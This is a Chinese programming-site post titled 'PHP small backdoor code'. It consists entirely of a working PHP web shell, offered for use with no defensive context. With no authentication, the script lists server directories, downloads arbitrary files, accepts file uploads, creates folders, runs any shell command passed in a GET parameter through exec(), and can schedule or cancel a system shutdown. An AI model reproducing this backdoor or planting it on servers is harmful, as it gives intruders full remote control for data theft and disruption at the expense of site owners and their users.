PHP小后门代码
程序员文章站
2022-05-16 18:25:57
...
1. [代码][PHP]代码
<?php $fp = ''; $path = ''; if(empty($_GET['action'])){ if(empty($_GET['path'])){ $_path = dirname(__FILE__); }else{ if(is_dir($_GET['path'])){ $_path = $_GET['path']; }else{ $_path .= dirname($_GET['path']); $file_name = $_GET['path']; if (!file_exists($file_name)) { //检查文件是否存在 echo "文件找不到"; } else { $file = fopen($file_name,"r"); // 打开文件 // 输入文件标签 Header("Content-type: application/octet-stream"); Header("Accept-Ranges: bytes"); Header("Accept-Length: ".filesize($file_name)); Header("Content-Disposition: attachment; filename=" . str_replace(array(dirname($_GET['path']),'/'),'',$file_name)); // 输出文件内容 echo fread($file,filesize($file_name)); fclose($file); exit; } } } }else if($_GET['action'] == 'close'){ $time = intval($_GET['time']) > 0 ? intval($_GET['time']) : $_GET['time']; exec('shutdown -s -t '.$time); $_path = $_GET['path']; }else if($_GET['action'] == 'cancel'){ exec('shutdown -a'); $_path = $_GET['path']; }else if($_GET['action'] == 'mkdir'){ $_path = $_GET['path']; $name = $_GET['name']; $_path .= $name; mkdir($_path); }else if($_GET['action'] == 'upload'){ $_path = $_POST['path']; $name = $_FILES['name']; move_uploaded_file($name['tmp_name'],$_path . $name['name'] ); }else if($_GET['action'] == 'ord'){ $_path = $_GET['path']; $name = $_GET['name']; exec($name); } $dir = dir($_path); ?> <table width="100%" border=1 > <tr> <th colspan=3> <form method="get" action="" > 目录:<input type="text" name="path" value="<?php echo $_path ?>" /> <input type="submit" value="跳转" /> </form> <input type="text" value="100" id="time">秒 <input type="button" value="关机" onclick="location.href='?time='+document.getElementById('time').value+'&action=close&path=<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>'" /> <input type="button" value="取消关机" onclick="location.href='?action=cancel&path=<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>'" /> <form method="get" action="" > 创建目录:<input type="text" name="name" value="" /> <input type="hidden" name="path" value="<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>" /> <input type="hidden" name="action" value="mkdir"> <input type="submit" value="创建" /> </form> <form method="get" action="" > 执行命令:<input type="text" name="name" value="" /> <input type="hidden" name="path" value="<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>" /> <input type="hidden" name="action" value="ord"> <input type="submit" value="创建" /> </form> <form method="post" action="?action=upload" enctype="multipart/form-data" > 文件上传:<input type="file" name="name" value="" /> <input type="hidden" name="path" value="<?php echo $fp == '..' ? @str_replace('\\','/',@dirname($_path)) : @str_replace('\\','/',$_path.'/'.$fp); ?>" /> <input type="submit" value="上传" /> </form> </th> </tr> <?php while($fp = $dir->read()){ ?> <tr> <td><a href="?path=<?php echo $fp == '..' ? @dirname($_path) : $_path.'/'.$fp; ?>"><?php echo $fp ?></a></td> <td>删除</td> <td>下载</td> </tr> <?php } ?> </table>
上一篇: php应用数据库连接中的单例模式
下一篇: 如何生成数千万不重复的固定长度的字符串?